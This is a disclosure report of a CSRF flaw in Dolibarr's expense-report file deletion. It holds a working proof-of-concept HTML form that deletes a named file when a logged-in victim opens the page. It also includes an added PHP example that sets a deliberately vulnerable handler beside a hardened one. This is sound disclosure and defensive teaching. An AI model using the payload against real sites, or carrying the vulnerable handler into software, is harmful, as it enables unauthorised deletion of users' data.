Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid

Reported on Jul 21st 2021


✍️ Description

In HRM --> Expense reports, the directory of files built by mass actions is not protected against CSRF on the delete action, so an attacker who can get a logged-in user to open a crafted page is able to delete arbitrary report files knowing only their names.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
    <!-- Replace the PoC page's URL in the address bar before submitting -->
    <script>history.pushState('', '', '/')</script>
    <!-- No method attribute, so the form submits a GET; the browser attaches the
         victim's session cookie. Values are HTML-entity encoded
         (&#95; = "_", &#46; = ".", &#45; = "-") -->
    <form action="https://demo.dolibarr.org/expensereport/list.php">
      <input type="hidden" name="sortfield" value="d&#46;date&#95;debut" />
      <input type="hidden" name="sortorder" value="DESC" />
      <input type="hidden" name="contextpage" value="expensereportlist" />
      <input type="hidden" name="search&#95;user" value="&#45;1" />
      <!-- The state-changing action and target file name; no anti-CSRF token -->
      <input type="hidden" name="action" value="remove&#95;file" />
      <input type="hidden" name="file" value="note&#95;de&#95;frais&#95;20210411024804&#46;pdf" />
      <input type="hidden" name="entity" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability allows deletion of the named files. Application version == 14 (tested on the demo website).
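As an added illustration, not Dolibarr's own code and not its fix, the snippet below shows a minimal PHP "remove_file" handler in the vulnerable shape the report describes, beside a hardened version that requires POST, checks a per-session anti-CSRF token, and confines the file name to the report directory. The $dir argument, the session key and csrf_token() are assumptions; the permission check a real handler also needs is assumed to happen elsewhere.

```php
<?php
// Added example, not Dolibarr's own code: a "remove_file" handler in the
// vulnerable shape described in the report, beside a hardened version.
// $dir is the expense-report directory; session key and helper names are
// hypothetical stand-ins for the application's own.
declare(strict_types=1);
session_start();

// Vulnerable shape: a GET parameter alone triggers the deletion. Any page
// the victim visits can submit such a form, and the browser attaches the
// session cookie itself, so the forged request arrives authenticated.
function remove_file_vulnerable(string $dir): bool
{
    if (($_GET['action'] ?? '') !== 'remove_file') {
        return false;
    }
    return unlink($dir . '/' . (string)($_GET['file'] ?? ''));
}

// Hardened shape: POST only, a per-session anti-CSRF token compared in
// constant time, and the file name confined to the report directory.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function remove_file_hardened(string $dir): bool
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        return false;                      // no state change on GET
    }
    $sent = (string)($_POST['token'] ?? '');
    if (!hash_equals(csrf_token(), $sent)) {
        return false;                      // token missing or forged
    }
    if (($_POST['action'] ?? '') !== 'remove_file') {
        return false;
    }
    $name = basename((string)($_POST['file'] ?? ''));
    $path = realpath($dir . '/' . $name);
    if ($name === '' || $path === false || dirname($path) !== realpath($dir)) {
        return false;                      // outside the report directory
    }
    return unlink($path);
}
// The legitimate delete form must then use method="post" and carry a hidden
// input named "token" whose value is csrf_token(); a plain GET link cannot delete.
```

A form served by a third-party site cannot read the victim's session token, so the hardened handler rejects the PoC's request even though the session cookie is still sent.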

Timeline

We have contacted a member of the dolibarr team and are waiting to hear back.
amammad modified the report.
Laurent Destailleur confirmed that a fix has been merged on c3e885.
Laurent Destailleur has been awarded the fix bounty.